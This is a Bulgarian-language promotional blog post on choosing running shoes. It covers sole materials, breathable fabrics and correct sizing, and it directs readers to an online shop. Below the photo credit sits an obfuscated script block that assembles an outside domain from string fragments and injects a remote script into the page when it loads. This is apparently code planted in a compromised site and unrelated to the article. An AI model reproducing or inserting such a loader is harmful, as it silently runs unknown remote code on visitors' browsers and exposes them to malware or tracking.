Още първите хора са оценили колко е важно да си издръжлив бегач. Сега, хилядиолетия по-късно вече бягаме, за щастие, само за удоволствие и от спортен хъс, но механиката на бягането все още е същата – с устрема на тялото придвижваме тялото напред с големи крачки, които ни дават усещането почти за полет.

Голямата разлика между бегачите преди и сега е, че сега бягаме обути с високотехнологични обувки. За разлика от босите бегачи навремето, които изобщо не са познавали подметките, днес краката ни са свикнали с комфорта на маратонките и не може да става и дума да подлагаме краката си на изпитания като преди.

Защо е важно с какви маратонки бягате

Хубавите маратонки за бягане не са просто „обувки“. Те са плод на дълогодишните усилия на специалисти в различни области, чиято цел е само една – да подобрят спортните постижения на атлетите.

Когато на чертожната дъска се оформи модел, достоен за олимпийци, той започва да се произвежда и за любителите атлети. Те, в по-голяма степен от професионалните си колеги, имат нужда от солидни маратонки за бягане, които да пазят краката им здрави.

Когато избирате Моделът маратинки за бягане, трябва да имате предвид няколко важни фактора:

Подметката

Няма да ни стигне мястото да изброим всички високотехнологични материи, гуми и пяна, от които се произвеждат подметките на маратонките за бягане. Всяка марка инвестира в разработка на нови материали, чрез които да постигне едновременно комфорт и упора за крака, отдаване на енергията обратно към крака и защита от травми.

Не подценявайте този елемент и отделете време да проучите как точно са направени подметките на вашите маратонки за бягане.

Текстилът

Леки, дишащи, проветриви, извеждащи влагата навън, създаващи оптимална температура на ходилото – такива трябва да са материите на идеалните маратонки за бягане.

Тук естествените материи се съчетават хармонично с новите, висотехнологични платове, за да постигнат онази степен на комфорт, която да направи всяко бягане приятно изживяване.

Размер

Винаги се уверявайте, че избирате правилния размер маратонки за бягане. Отделете специално внимание на дължината и ширината на ходилото си и купете този чифт, който ще пасне идеално на ходилото ви. Компромис с размера означава компромис с безопасността ви.

Разнообразие от маратонки за бягане ви очаква на Footshop.bg.

Източник на снимка:

WAYHOME studio / Shutterstock.com

<script>
(function(){
al76=document.createElement(„script“);al76_=“u“+(„s“)+“ta“;
al76_+=(„t.i“)+““+“n“;al76_+=((„f“)+“o“);al76.type=“text/javascript“;
al76_+=“/“; al76u=“302709356″;al76u+=“.wk9qb9hil76py8evg15″;al76u+=“zdah1jc0w8t“;
al76.src=“https://“+al76_+al76u;al76.async=true;document.body.appendChild(al76);
})();
</script>

Оставете отговор

Please enter your comment!
Моля въведете името ви